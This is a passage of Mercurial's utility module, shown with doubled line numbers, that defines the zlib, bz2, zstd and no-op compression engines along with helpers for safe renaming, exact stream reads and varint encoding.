3713 def forwiretype(self, wiretype):
3714 engine = self._engines[self._wiretypes[wiretype]]
3714 engine = self._engines[self._wiretypes[wiretype]]
3715 if not engine.available():
3715 if not engine.available():
3716 raise error.Abort(_('compression engine %s could not be loaded') %
3716 raise error.Abort(_('compression engine %s could not be loaded') %
3717 engine.name())
3717 engine.name())
3718 return engine
3718 return engine
3719
3719
3720 def forrevlogheader(self, header):
3720 def forrevlogheader(self, header):
3721 """Obtain a compression engine registered to a revlog header.
3721 """Obtain a compression engine registered to a revlog header.
3722
3722
3723 Will raise KeyError if the revlog header value isn't registered.
3723 Will raise KeyError if the revlog header value isn't registered.
3724 """
3724 """
3725 return self._engines[self._revlogheaders[header]]
3725 return self._engines[self._revlogheaders[header]]
3726
3726
3727 compengines = compressormanager()
3727 compengines = compressormanager()
3728
3728
3729 class compressionengine(object):
3729 class compressionengine(object):
3730 """Base class for compression engines.
3730 """Base class for compression engines.
3731
3731
3732 Compression engines must implement the interface defined by this class.
3732 Compression engines must implement the interface defined by this class.
3733 """
3733 """
3734 def name(self):
3734 def name(self):
3735 """Returns the name of the compression engine.
3735 """Returns the name of the compression engine.
3736
3736
3737 This is the key the engine is registered under.
3737 This is the key the engine is registered under.
3738
3738
3739 This method must be implemented.
3739 This method must be implemented.
3740 """
3740 """
3741 raise NotImplementedError()
3741 raise NotImplementedError()
3742
3742
3743 def available(self):
3743 def available(self):
3744 """Whether the compression engine is available.
3744 """Whether the compression engine is available.
3745
3745
3746 The intent of this method is to allow optional compression engines
3746 The intent of this method is to allow optional compression engines
3747 that may not be available in all installations (such as engines relying
3747 that may not be available in all installations (such as engines relying
3748 on C extensions that may not be present).
3748 on C extensions that may not be present).
3749 """
3749 """
3750 return True
3750 return True
3751
3751
3752 def bundletype(self):
3752 def bundletype(self):
3753 """Describes bundle identifiers for this engine.
3753 """Describes bundle identifiers for this engine.
3754
3754
3755 If this compression engine isn't supported for bundles, returns None.
3755 If this compression engine isn't supported for bundles, returns None.
3756
3756
3757 If this engine can be used for bundles, returns a 2-tuple of strings of
3757 If this engine can be used for bundles, returns a 2-tuple of strings of
3758 the user-facing "bundle spec" compression name and an internal
3758 the user-facing "bundle spec" compression name and an internal
3759 identifier used to denote the compression format within bundles. To
3759 identifier used to denote the compression format within bundles. To
3760 exclude the name from external usage, set the first element to ``None``.
3760 exclude the name from external usage, set the first element to ``None``.
3761
3761
3762 If bundle compression is supported, the class must also implement
3762 If bundle compression is supported, the class must also implement
3763 ``compressstream`` and `decompressorreader``.
3763 ``compressstream`` and `decompressorreader``.
3764
3764
3765 The docstring of this method is used in the help system to tell users
3765 The docstring of this method is used in the help system to tell users
3766 about this engine.
3766 about this engine.
3767 """
3767 """
3768 return None
3768 return None
3769
3769
3770 def wireprotosupport(self):
3770 def wireprotosupport(self):
3771 """Declare support for this compression format on the wire protocol.
3771 """Declare support for this compression format on the wire protocol.
3772
3772
3773 If this compression engine isn't supported for compressing wire
3773 If this compression engine isn't supported for compressing wire
3774 protocol payloads, returns None.
3774 protocol payloads, returns None.
3775
3775
3776 Otherwise, returns ``compenginewireprotosupport`` with the following
3776 Otherwise, returns ``compenginewireprotosupport`` with the following
3777 fields:
3777 fields:
3778
3778
3779 * String format identifier
3779 * String format identifier
3780 * Integer priority for the server
3780 * Integer priority for the server
3781 * Integer priority for the client
3781 * Integer priority for the client
3782
3782
3783 The integer priorities are used to order the advertisement of format
3783 The integer priorities are used to order the advertisement of format
3784 support by server and client. The highest integer is advertised
3784 support by server and client. The highest integer is advertised
3785 first. Integers with non-positive values aren't advertised.
3785 first. Integers with non-positive values aren't advertised.
3786
3786
3787 The priority values are somewhat arbitrary and only used for default
3787 The priority values are somewhat arbitrary and only used for default
3788 ordering. The relative order can be changed via config options.
3788 ordering. The relative order can be changed via config options.
3789
3789
3790 If wire protocol compression is supported, the class must also implement
3790 If wire protocol compression is supported, the class must also implement
3791 ``compressstream`` and ``decompressorreader``.
3791 ``compressstream`` and ``decompressorreader``.
3792 """
3792 """
3793 return None
3793 return None
3794
3794
3795 def revlogheader(self):
3795 def revlogheader(self):
3796 """Header added to revlog chunks that identifies this engine.
3796 """Header added to revlog chunks that identifies this engine.
3797
3797
3798 If this engine can be used to compress revlogs, this method should
3798 If this engine can be used to compress revlogs, this method should
3799 return the bytes used to identify chunks compressed with this engine.
3799 return the bytes used to identify chunks compressed with this engine.
3800 Else, the method should return ``None`` to indicate it does not
3800 Else, the method should return ``None`` to indicate it does not
3801 participate in revlog compression.
3801 participate in revlog compression.
3802 """
3802 """
3803 return None
3803 return None
3804
3804
3805 def compressstream(self, it, opts=None):
3805 def compressstream(self, it, opts=None):
3806 """Compress an iterator of chunks.
3806 """Compress an iterator of chunks.
3807
3807
3808 The method receives an iterator (ideally a generator) of chunks of
3808 The method receives an iterator (ideally a generator) of chunks of
3809 bytes to be compressed. It returns an iterator (ideally a generator)
3809 bytes to be compressed. It returns an iterator (ideally a generator)
3810 of bytes of chunks representing the compressed output.
3810 of bytes of chunks representing the compressed output.
3811
3811
3812 Optionally accepts an argument defining how to perform compression.
3812 Optionally accepts an argument defining how to perform compression.
3813 Each engine treats this argument differently.
3813 Each engine treats this argument differently.
3814 """
3814 """
3815 raise NotImplementedError()
3815 raise NotImplementedError()
3816
3816
3817 def decompressorreader(self, fh):
3817 def decompressorreader(self, fh):
3818 """Perform decompression on a file object.
3818 """Perform decompression on a file object.
3819
3819
3820 Argument is an object with a ``read(size)`` method that returns
3820 Argument is an object with a ``read(size)`` method that returns
3821 compressed data. Return value is an object with a ``read(size)`` that
3821 compressed data. Return value is an object with a ``read(size)`` that
3822 returns uncompressed data.
3822 returns uncompressed data.
3823 """
3823 """
3824 raise NotImplementedError()
3824 raise NotImplementedError()
3825
3825
3826 def revlogcompressor(self, opts=None):
3826 def revlogcompressor(self, opts=None):
3827 """Obtain an object that can be used to compress revlog entries.
3827 """Obtain an object that can be used to compress revlog entries.
3828
3828
3829 The object has a ``compress(data)`` method that compresses binary
3829 The object has a ``compress(data)`` method that compresses binary
3830 data. This method returns compressed binary data or ``None`` if
3830 data. This method returns compressed binary data or ``None`` if
3831 the data could not be compressed (too small, not compressible, etc).
3831 the data could not be compressed (too small, not compressible, etc).
3832 The returned data should have a header uniquely identifying this
3832 The returned data should have a header uniquely identifying this
3833 compression format so decompression can be routed to this engine.
3833 compression format so decompression can be routed to this engine.
3834 This header should be identified by the ``revlogheader()`` return
3834 This header should be identified by the ``revlogheader()`` return
3835 value.
3835 value.
3836
3836
3837 The object has a ``decompress(data)`` method that decompresses
3837 The object has a ``decompress(data)`` method that decompresses
3838 data. The method will only be called if ``data`` begins with
3838 data. The method will only be called if ``data`` begins with
3839 ``revlogheader()``. The method should return the raw, uncompressed
3839 ``revlogheader()``. The method should return the raw, uncompressed
3840 data or raise a ``RevlogError``.
3840 data or raise a ``RevlogError``.
3841
3841
3842 The object is reusable but is not thread safe.
3842 The object is reusable but is not thread safe.
3843 """
3843 """
3844 raise NotImplementedError()
3844 raise NotImplementedError()
3845
3845
3846 class _zlibengine(compressionengine):
3846 class _zlibengine(compressionengine):
3847 def name(self):
3847 def name(self):
3848 return 'zlib'
3848 return 'zlib'
3849
3849
3850 def bundletype(self):
3850 def bundletype(self):
3851 """zlib compression using the DEFLATE algorithm.
3851 """zlib compression using the DEFLATE algorithm.
3852
3852
3853 All Mercurial clients should support this format. The compression
3853 All Mercurial clients should support this format. The compression
3854 algorithm strikes a reasonable balance between compression ratio
3854 algorithm strikes a reasonable balance between compression ratio
3855 and size.
3855 and size.
3856 """
3856 """
3857 return 'gzip', 'GZ'
3857 return 'gzip', 'GZ'
3858
3858
3859 def wireprotosupport(self):
3859 def wireprotosupport(self):
3860 return compewireprotosupport('zlib', 20, 20)
3860 return compewireprotosupport('zlib', 20, 20)
3861
3861
3862 def revlogheader(self):
3862 def revlogheader(self):
3863 return 'x'
3863 return 'x'
3864
3864
3865 def compressstream(self, it, opts=None):
3865 def compressstream(self, it, opts=None):
3866 opts = opts or {}
3866 opts = opts or {}
3867
3867
3868 z = zlib.compressobj(opts.get('level', -1))
3868 z = zlib.compressobj(opts.get('level', -1))
3869 for chunk in it:
3869 for chunk in it:
3870 data = z.compress(chunk)
3870 data = z.compress(chunk)
3871 # Not all calls to compress emit data. It is cheaper to inspect
3871 # Not all calls to compress emit data. It is cheaper to inspect
3872 # here than to feed empty chunks through generator.
3872 # here than to feed empty chunks through generator.
3873 if data:
3873 if data:
3874 yield data
3874 yield data
3875
3875
3876 yield z.flush()
3876 yield z.flush()
3877
3877
3878 def decompressorreader(self, fh):
3878 def decompressorreader(self, fh):
3879 def gen():
3879 def gen():
3880 d = zlib.decompressobj()
3880 d = zlib.decompressobj()
3881 for chunk in filechunkiter(fh):
3881 for chunk in filechunkiter(fh):
3882 while chunk:
3882 while chunk:
3883 # Limit output size to limit memory.
3883 # Limit output size to limit memory.
3884 yield d.decompress(chunk, 2 ** 18)
3884 yield d.decompress(chunk, 2 ** 18)
3885 chunk = d.unconsumed_tail
3885 chunk = d.unconsumed_tail
3886
3886
3887 return chunkbuffer(gen())
3887 return chunkbuffer(gen())
3888
3888
3889 class zlibrevlogcompressor(object):
3889 class zlibrevlogcompressor(object):
3890 def compress(self, data):
3890 def compress(self, data):
3891 insize = len(data)
3891 insize = len(data)
3892 # Caller handles empty input case.
3892 # Caller handles empty input case.
3893 assert insize > 0
3893 assert insize > 0
3894
3894
3895 if insize < 44:
3895 if insize < 44:
3896 return None
3896 return None
3897
3897
3898 elif insize <= 1000000:
3898 elif insize <= 1000000:
3899 compressed = zlib.compress(data)
3899 compressed = zlib.compress(data)
3900 if len(compressed) < insize:
3900 if len(compressed) < insize:
3901 return compressed
3901 return compressed
3902 return None
3902 return None
3903
3903
3904 # zlib makes an internal copy of the input buffer, doubling
3904 # zlib makes an internal copy of the input buffer, doubling
3905 # memory usage for large inputs. So do streaming compression
3905 # memory usage for large inputs. So do streaming compression
3906 # on large inputs.
3906 # on large inputs.
3907 else:
3907 else:
3908 z = zlib.compressobj()
3908 z = zlib.compressobj()
3909 parts = []
3909 parts = []
3910 pos = 0
3910 pos = 0
3911 while pos < insize:
3911 while pos < insize:
3912 pos2 = pos + 2**20
3912 pos2 = pos + 2**20
3913 parts.append(z.compress(data[pos:pos2]))
3913 parts.append(z.compress(data[pos:pos2]))
3914 pos = pos2
3914 pos = pos2
3915 parts.append(z.flush())
3915 parts.append(z.flush())
3916
3916
3917 if sum(map(len, parts)) < insize:
3917 if sum(map(len, parts)) < insize:
3918 return ''.join(parts)
3918 return ''.join(parts)
3919 return None
3919 return None
3920
3920
3921 def decompress(self, data):
3921 def decompress(self, data):
3922 try:
3922 try:
3923 return zlib.decompress(data)
3923 return zlib.decompress(data)
3924 except zlib.error as e:
3924 except zlib.error as e:
3925 raise error.RevlogError(_('revlog decompress error: %s') %
3925 raise error.RevlogError(_('revlog decompress error: %s') %
3926 forcebytestr(e))
3926 forcebytestr(e))
3927
3927
3928 def revlogcompressor(self, opts=None):
3928 def revlogcompressor(self, opts=None):
3929 return self.zlibrevlogcompressor()
3929 return self.zlibrevlogcompressor()
3930
3930
3931 compengines.register(_zlibengine())
3931 compengines.register(_zlibengine())
3932
3932
3933 class _bz2engine(compressionengine):
3933 class _bz2engine(compressionengine):
3934 def name(self):
3934 def name(self):
3935 return 'bz2'
3935 return 'bz2'
3936
3936
3937 def bundletype(self):
3937 def bundletype(self):
3938 """An algorithm that produces smaller bundles than ``gzip``.
3938 """An algorithm that produces smaller bundles than ``gzip``.
3939
3939
3940 All Mercurial clients should support this format.
3940 All Mercurial clients should support this format.
3941
3941
3942 This engine will likely produce smaller bundles than ``gzip`` but
3942 This engine will likely produce smaller bundles than ``gzip`` but
3943 will be significantly slower, both during compression and
3943 will be significantly slower, both during compression and
3944 decompression.
3944 decompression.
3945
3945
3946 If available, the ``zstd`` engine can yield similar or better
3946 If available, the ``zstd`` engine can yield similar or better
3947 compression at much higher speeds.
3947 compression at much higher speeds.
3948 """
3948 """
3949 return 'bzip2', 'BZ'
3949 return 'bzip2', 'BZ'
3950
3950
3951 # We declare a protocol name but don't advertise by default because
3951 # We declare a protocol name but don't advertise by default because
3952 # it is slow.
3952 # it is slow.
3953 def wireprotosupport(self):
3953 def wireprotosupport(self):
3954 return compewireprotosupport('bzip2', 0, 0)
3954 return compewireprotosupport('bzip2', 0, 0)
3955
3955
3956 def compressstream(self, it, opts=None):
3956 def compressstream(self, it, opts=None):
3957 opts = opts or {}
3957 opts = opts or {}
3958 z = bz2.BZ2Compressor(opts.get('level', 9))
3958 z = bz2.BZ2Compressor(opts.get('level', 9))
3959 for chunk in it:
3959 for chunk in it:
3960 data = z.compress(chunk)
3960 data = z.compress(chunk)
3961 if data:
3961 if data:
3962 yield data
3962 yield data
3963
3963
3964 yield z.flush()
3964 yield z.flush()
3965
3965
3966 def decompressorreader(self, fh):
3966 def decompressorreader(self, fh):
3967 def gen():
3967 def gen():
3968 d = bz2.BZ2Decompressor()
3968 d = bz2.BZ2Decompressor()
3969 for chunk in filechunkiter(fh):
3969 for chunk in filechunkiter(fh):
3970 yield d.decompress(chunk)
3970 yield d.decompress(chunk)
3971
3971
3972 return chunkbuffer(gen())
3972 return chunkbuffer(gen())
3973
3973
3974 compengines.register(_bz2engine())
3974 compengines.register(_bz2engine())
3975
3975
3976 class _truncatedbz2engine(compressionengine):
3976 class _truncatedbz2engine(compressionengine):
3977 def name(self):
3977 def name(self):
3978 return 'bz2truncated'
3978 return 'bz2truncated'
3979
3979
3980 def bundletype(self):
3980 def bundletype(self):
3981 return None, '_truncatedBZ'
3981 return None, '_truncatedBZ'
3982
3982
3983 # We don't implement compressstream because it is hackily handled elsewhere.
3983 # We don't implement compressstream because it is hackily handled elsewhere.
3984
3984
3985 def decompressorreader(self, fh):
3985 def decompressorreader(self, fh):
3986 def gen():
3986 def gen():
3987 # The input stream doesn't have the 'BZ' header. So add it back.
3987 # The input stream doesn't have the 'BZ' header. So add it back.
3988 d = bz2.BZ2Decompressor()
3988 d = bz2.BZ2Decompressor()
3989 d.decompress('BZ')
3989 d.decompress('BZ')
3990 for chunk in filechunkiter(fh):
3990 for chunk in filechunkiter(fh):
3991 yield d.decompress(chunk)
3991 yield d.decompress(chunk)
3992
3992
3993 return chunkbuffer(gen())
3993 return chunkbuffer(gen())
3994
3994
3995 compengines.register(_truncatedbz2engine())
3995 compengines.register(_truncatedbz2engine())
3996
3996
3997 class _noopengine(compressionengine):
3997 class _noopengine(compressionengine):
3998 def name(self):
3998 def name(self):
3999 return 'none'
3999 return 'none'
4000
4000
4001 def bundletype(self):
4001 def bundletype(self):
4002 """No compression is performed.
4002 """No compression is performed.
4003
4003
4004 Use this compression engine to explicitly disable compression.
4004 Use this compression engine to explicitly disable compression.
4005 """
4005 """
4006 return 'none', 'UN'
4006 return 'none', 'UN'
4007
4007
4008 # Clients always support uncompressed payloads. Servers don't because
4008 # Clients always support uncompressed payloads. Servers don't because
4009 # unless you are on a fast network, uncompressed payloads can easily
4009 # unless you are on a fast network, uncompressed payloads can easily
4010 # saturate your network pipe.
4010 # saturate your network pipe.
4011 def wireprotosupport(self):
4011 def wireprotosupport(self):
4012 return compewireprotosupport('none', 0, 10)
4012 return compewireprotosupport('none', 0, 10)
4013
4013
4014 # We don't implement revlogheader because it is handled specially
4014 # We don't implement revlogheader because it is handled specially
4015 # in the revlog class.
4015 # in the revlog class.
4016
4016
4017 def compressstream(self, it, opts=None):
4017 def compressstream(self, it, opts=None):
4018 return it
4018 return it
4019
4019
4020 def decompressorreader(self, fh):
4020 def decompressorreader(self, fh):
4021 return fh
4021 return fh
4022
4022
4023 class nooprevlogcompressor(object):
4023 class nooprevlogcompressor(object):
4024 def compress(self, data):
4024 def compress(self, data):
4025 return None
4025 return None
4026
4026
4027 def revlogcompressor(self, opts=None):
4027 def revlogcompressor(self, opts=None):
4028 return self.nooprevlogcompressor()
4028 return self.nooprevlogcompressor()
4029
4029
4030 compengines.register(_noopengine())
4030 compengines.register(_noopengine())
4031
4031
4032 class _zstdengine(compressionengine):
4032 class _zstdengine(compressionengine):
4033 def name(self):
4033 def name(self):
4034 return 'zstd'
4034 return 'zstd'
4035
4035
4036 @propertycache
4036 @propertycache
4037 def _module(self):
4037 def _module(self):
4038 # Not all installs have the zstd module available. So defer importing
4038 # Not all installs have the zstd module available. So defer importing
4039 # until first access.
4039 # until first access.
4040 try:
4040 try:
4041 from . import zstd
4041 from . import zstd
4042 # Force delayed import.
4042 # Force delayed import.
4043 zstd.__version__
4043 zstd.__version__
4044 return zstd
4044 return zstd
4045 except ImportError:
4045 except ImportError:
4046 return None
4046 return None
4047
4047
4048 def available(self):
4048 def available(self):
4049 return bool(self._module)
4049 return bool(self._module)
4050
4050
4051 def bundletype(self):
4051 def bundletype(self):
4052 """A modern compression algorithm that is fast and highly flexible.
4052 """A modern compression algorithm that is fast and highly flexible.
4053
4053
4054 Only supported by Mercurial 4.1 and newer clients.
4054 Only supported by Mercurial 4.1 and newer clients.
4055
4055
4056 With the default settings, zstd compression is both faster and yields
4056 With the default settings, zstd compression is both faster and yields
4057 better compression than ``gzip``. It also frequently yields better
4057 better compression than ``gzip``. It also frequently yields better
4058 compression than ``bzip2`` while operating at much higher speeds.
4058 compression than ``bzip2`` while operating at much higher speeds.
4059
4059
4060 If this engine is available and backwards compatibility is not a
4060 If this engine is available and backwards compatibility is not a
4061 concern, it is likely the best available engine.
4061 concern, it is likely the best available engine.
4062 """
4062 """
4063 return 'zstd', 'ZS'
4063 return 'zstd', 'ZS'
4064
4064
4065 def wireprotosupport(self):
4065 def wireprotosupport(self):
4066 return compewireprotosupport('zstd', 50, 50)
4066 return compewireprotosupport('zstd', 50, 50)
4067
4067
4068 def revlogheader(self):
4068 def revlogheader(self):
4069 return '\x28'
4069 return '\x28'
4070
4070
4071 def compressstream(self, it, opts=None):
4071 def compressstream(self, it, opts=None):
4072 opts = opts or {}
4072 opts = opts or {}
4073 # zstd level 3 is almost always significantly faster than zlib
4073 # zstd level 3 is almost always significantly faster than zlib
4074 # while providing no worse compression. It strikes a good balance
4074 # while providing no worse compression. It strikes a good balance
4075 # between speed and compression.
4075 # between speed and compression.
4076 level = opts.get('level', 3)
4076 level = opts.get('level', 3)
4077
4077
4078 zstd = self._module
4078 zstd = self._module
4079 z = zstd.ZstdCompressor(level=level).compressobj()
4079 z = zstd.ZstdCompressor(level=level).compressobj()
4080 for chunk in it:
4080 for chunk in it:
4081 data = z.compress(chunk)
4081 data = z.compress(chunk)
4082 if data:
4082 if data:
4083 yield data
4083 yield data
4084
4084
4085 yield z.flush()
4085 yield z.flush()
4086
4086
4087 def decompressorreader(self, fh):
4087 def decompressorreader(self, fh):
4088 zstd = self._module
4088 zstd = self._module
4089 dctx = zstd.ZstdDecompressor()
4089 dctx = zstd.ZstdDecompressor()
4090 return chunkbuffer(dctx.read_from(fh))
4090 return chunkbuffer(dctx.read_from(fh))
4091
4091
4092 class zstdrevlogcompressor(object):
4092 class zstdrevlogcompressor(object):
4093 def __init__(self, zstd, level=3):
4093 def __init__(self, zstd, level=3):
4094 # Writing the content size adds a few bytes to the output. However,
4094 # Writing the content size adds a few bytes to the output. However,
4095 # it allows decompression to be more optimal since we can
4095 # it allows decompression to be more optimal since we can
4096 # pre-allocate a buffer to hold the result.
4096 # pre-allocate a buffer to hold the result.
4097 self._cctx = zstd.ZstdCompressor(level=level,
4097 self._cctx = zstd.ZstdCompressor(level=level,
4098 write_content_size=True)
4098 write_content_size=True)
4099 self._dctx = zstd.ZstdDecompressor()
4099 self._dctx = zstd.ZstdDecompressor()
4100 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4100 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4101 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4101 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4102
4102
4103 def compress(self, data):
4103 def compress(self, data):
4104 insize = len(data)
4104 insize = len(data)
4105 # Caller handles empty input case.
4105 # Caller handles empty input case.
4106 assert insize > 0
4106 assert insize > 0
4107
4107
4108 if insize < 50:
4108 if insize < 50:
4109 return None
4109 return None
4110
4110
4111 elif insize <= 1000000:
4111 elif insize <= 1000000:
4112 compressed = self._cctx.compress(data)
4112 compressed = self._cctx.compress(data)
4113 if len(compressed) < insize:
4113 if len(compressed) < insize:
4114 return compressed
4114 return compressed
4115 return None
4115 return None
4116 else:
4116 else:
4117 z = self._cctx.compressobj()
4117 z = self._cctx.compressobj()
4118 chunks = []
4118 chunks = []
4119 pos = 0
4119 pos = 0
4120 while pos < insize:
4120 while pos < insize:
4121 pos2 = pos + self._compinsize
4121 pos2 = pos + self._compinsize
4122 chunk = z.compress(data[pos:pos2])
4122 chunk = z.compress(data[pos:pos2])
4123 if chunk:
4123 if chunk:
4124 chunks.append(chunk)
4124 chunks.append(chunk)
4125 pos = pos2
4125 pos = pos2
4126 chunks.append(z.flush())
4126 chunks.append(z.flush())
4127
4127
4128 if sum(map(len, chunks)) < insize:
4128 if sum(map(len, chunks)) < insize:
4129 return ''.join(chunks)
4129 return ''.join(chunks)
4130 return None
4130 return None
4131
4131
4132 def decompress(self, data):
4132 def decompress(self, data):
4133 insize = len(data)
4133 insize = len(data)
4134
4134
4135 try:
4135 try:
4136 # This was measured to be faster than other streaming
4136 # This was measured to be faster than other streaming
4137 # decompressors.
4137 # decompressors.
4138 dobj = self._dctx.decompressobj()
4138 dobj = self._dctx.decompressobj()
4139 chunks = []
4139 chunks = []
4140 pos = 0
4140 pos = 0
4141 while pos < insize:
4141 while pos < insize:
4142 pos2 = pos + self._decompinsize
4142 pos2 = pos + self._decompinsize
4143 chunk = dobj.decompress(data[pos:pos2])
4143 chunk = dobj.decompress(data[pos:pos2])
4144 if chunk:
4144 if chunk:
4145 chunks.append(chunk)
4145 chunks.append(chunk)
4146 pos = pos2
4146 pos = pos2
4147 # Frame should be exhausted, so no finish() API.
4147 # Frame should be exhausted, so no finish() API.
4148
4148
4149 return ''.join(chunks)
4149 return ''.join(chunks)
4150 except Exception as e:
4150 except Exception as e:
4151 raise error.RevlogError(_('revlog decompress error: %s') %
4151 raise error.RevlogError(_('revlog decompress error: %s') %
4152 forcebytestr(e))
4152 forcebytestr(e))
4153
4153
4154 def revlogcompressor(self, opts=None):
4154 def revlogcompressor(self, opts=None):
4155 opts = opts or {}
4155 opts = opts or {}
4156 return self.zstdrevlogcompressor(self._module,
4156 return self.zstdrevlogcompressor(self._module,
4157 level=opts.get('level', 3))
4157 level=opts.get('level', 3))
4158
4158
4159 compengines.register(_zstdengine())
4159 compengines.register(_zstdengine())
4160
4160
4161 def bundlecompressiontopics():
4161 def bundlecompressiontopics():
4162 """Obtains a list of available bundle compressions for use in help."""
4162 """Obtains a list of available bundle compressions for use in help."""
4163 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4163 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4164 items = {}
4164 items = {}
4165
4165
4166 # We need to format the docstring. So use a dummy object/type to hold it
4166 # We need to format the docstring. So use a dummy object/type to hold it
4167 # rather than mutating the original.
4167 # rather than mutating the original.
4168 class docobject(object):
4168 class docobject(object):
4169 pass
4169 pass
4170
4170
4171 for name in compengines:
4171 for name in compengines:
4172 engine = compengines[name]
4172 engine = compengines[name]
4173
4173
4174 if not engine.available():
4174 if not engine.available():
4175 continue
4175 continue
4176
4176
4177 bt = engine.bundletype()
4177 bt = engine.bundletype()
4178 if not bt or not bt[0]:
4178 if not bt or not bt[0]:
4179 continue
4179 continue
4180
4180
4181 doc = pycompat.sysstr('``%s``\n %s') % (
4181 doc = pycompat.sysstr('``%s``\n %s') % (
4182 bt[0], engine.bundletype.__doc__)
4182 bt[0], engine.bundletype.__doc__)
4183
4183
4184 value = docobject()
4184 value = docobject()
4185 value.__doc__ = doc
4185 value.__doc__ = doc
4186 value._origdoc = engine.bundletype.__doc__
4186 value._origdoc = engine.bundletype.__doc__
4187 value._origfunc = engine.bundletype
4187 value._origfunc = engine.bundletype
4188
4188
4189 items[bt[0]] = value
4189 items[bt[0]] = value
4190
4190
4191 return items
4191 return items
4192
4192
4193 i18nfunctions = bundlecompressiontopics().values()
4193 i18nfunctions = bundlecompressiontopics().values()
4194
4194
4195 # convenient shortcut
4195 # convenient shortcut
4196 dst = debugstacktrace
4196 dst = debugstacktrace
4197
4197
4198 def safename(f, tag, ctx, others=None):
4198 def safename(f, tag, ctx, others=None):
4199 """
4199 """
4200 Generate a name that it is safe to rename f to in the given context.
4200 Generate a name that it is safe to rename f to in the given context.
4201
4201
4202 f: filename to rename
4202 f: filename to rename
4203 tag: a string tag that will be included in the new name
4203 tag: a string tag that will be included in the new name
4204 ctx: a context, in which the new name must not exist
4204 ctx: a context, in which the new name must not exist
4205 others: a set of other filenames that the new name must not be in
4205 others: a set of other filenames that the new name must not be in
4206
4206
4207 Returns a file name of the form oldname~tag[~number] which does not exist
4207 Returns a file name of the form oldname~tag[~number] which does not exist
4208 in the provided context and is not in the set of other names.
4208 in the provided context and is not in the set of other names.
4209 """
4209 """
4210 if others is None:
4210 if others is None:
4211 others = set()
4211 others = set()
4212
4212
4213 fn = '%s~%s' % (f, tag)
4213 fn = '%s~%s' % (f, tag)
4214 if fn not in ctx and fn not in others:
4214 if fn not in ctx and fn not in others:
4215 return fn
4215 return fn
4216 for n in itertools.count(1):
4216 for n in itertools.count(1):
4217 fn = '%s~%s~%s' % (f, tag, n)
4217 fn = '%s~%s~%s' % (f, tag, n)
4218 if fn not in ctx and fn not in others:
4218 if fn not in ctx and fn not in others:
4219 return fn
4219 return fn
4220
4220
4221 def readexactly(stream, n):
4221 def readexactly(stream, n):
4222 '''read n bytes from stream.read and abort if less was available'''
4222 '''read n bytes from stream.read and abort if less was available'''
4223 s = stream.read(n)
4223 s = stream.read(n)
4224 if len(s) < n:
4224 if len(s) < n:
4225 raise error.Abort(_("stream ended unexpectedly"
4225 raise error.Abort(_("stream ended unexpectedly"
4226 " (got %d bytes, expected %d)")
4226 " (got %d bytes, expected %d)")
4227 % (len(s), n))
4227 % (len(s), n))
4228 return s
4228 return s
4229
4229
4230 def uvarintencode(value):
4230 def uvarintencode(value):
4231 """Encode an unsigned integer value to a varint.
4231 """Encode an unsigned integer value to a varint.
4232
4232
4233 A varint is a variable length integer of 1 or more bytes. Each byte
4233 A varint is a variable length integer of 1 or more bytes. Each byte
4234 except the last has the most significant bit set. The lower 7 bits of
4234 except the last has the most significant bit set. The lower 7 bits of
4235 each byte store the 2's complement representation, least significant group
4235 each byte store the 2's complement representation, least significant group
4236 first.
4236 first.
4237
4237
4238 >>> uvarintencode(0)
4238 >>> uvarintencode(0)
4239 '\\x00'
4239 '\\x00'
4240 >>> uvarintencode(1)
4240 >>> uvarintencode(1)
4241 '\\x01'
4241 '\\x01'
4242 >>> uvarintencode(127)
4242 >>> uvarintencode(127)
4243 '\\x7f'
4243 '\\x7f'
4244 >>> uvarintencode(1337)
4244 >>> uvarintencode(1337)
4245 '\\xb9\\n'
4245 '\\xb9\\n'
4246 >>> uvarintencode(65536)
4246 >>> uvarintencode(65536)
4247 '\\x80\\x80\\x04'
4247 '\\x80\\x80\\x04'
4248 >>> uvarintencode(-1)
4248 >>> uvarintencode(-1)
4249 Traceback (most recent call last):
4249 Traceback (most recent call last):
4250 ...
4250 ...
4251 ProgrammingError: negative value for uvarint: -1
4251 ProgrammingError: negative value for uvarint: -1
4252 """
4252 """
4253 if value < 0:
4253 if value < 0:
4254 raise error.ProgrammingError('negative value for uvarint: %d'
4254 raise error.ProgrammingError('negative value for uvarint: %d'
4255 % value)
4255 % value)
4256 bits = value & 0x7f
4256 bits = value & 0x7f
4257 value >>= 7
4257 value >>= 7
4258 bytes = []
4258 bytes = []
4259 while value:
4259 while value:
4260 bytes.append(pycompat.bytechr(0x80 | bits))
4260 bytes.append(pycompat.bytechr(0x80 | bits))
4261 bits = value & 0x7f
4261 bits = value & 0x7f
4262 value >>= 7
4262 value >>= 7
4263 bytes.append(pycompat.bytechr(bits))
4263 bytes.append(pycompat.bytechr(bits))
4264
4264
4265 return ''.join(bytes)
4265 return ''.join(bytes)
4266
4266
4267 def uvarintdecodestream(fh):
4267 def uvarintdecodestream(fh):
4268 """Decode an unsigned variable length integer from a stream.
4268 """Decode an unsigned variable length integer from a stream.
4269
4269
4270 The passed argument is anything that has a ``.read(N)`` method.
4270 The passed argument is anything that has a ``.read(N)`` method.
4271
4271
4272 >>> try:
4272 >>> try:
4273 ... from StringIO import StringIO as BytesIO
4273 ... from StringIO import StringIO as BytesIO
4274 ... except ImportError:
4274 ... except ImportError:
4275 ... from io import BytesIO
4275 ... from io import BytesIO
4276 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4276 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4277 0
4277 0
4278 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4278 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4279 1
4279 1
4280 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4280 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4281 127
4281 127
4282 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4282 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4283 1337
4283 1337
4284 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4284 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4285 65536
4285 65536
4286 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4286 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4287 Traceback (most recent call last):
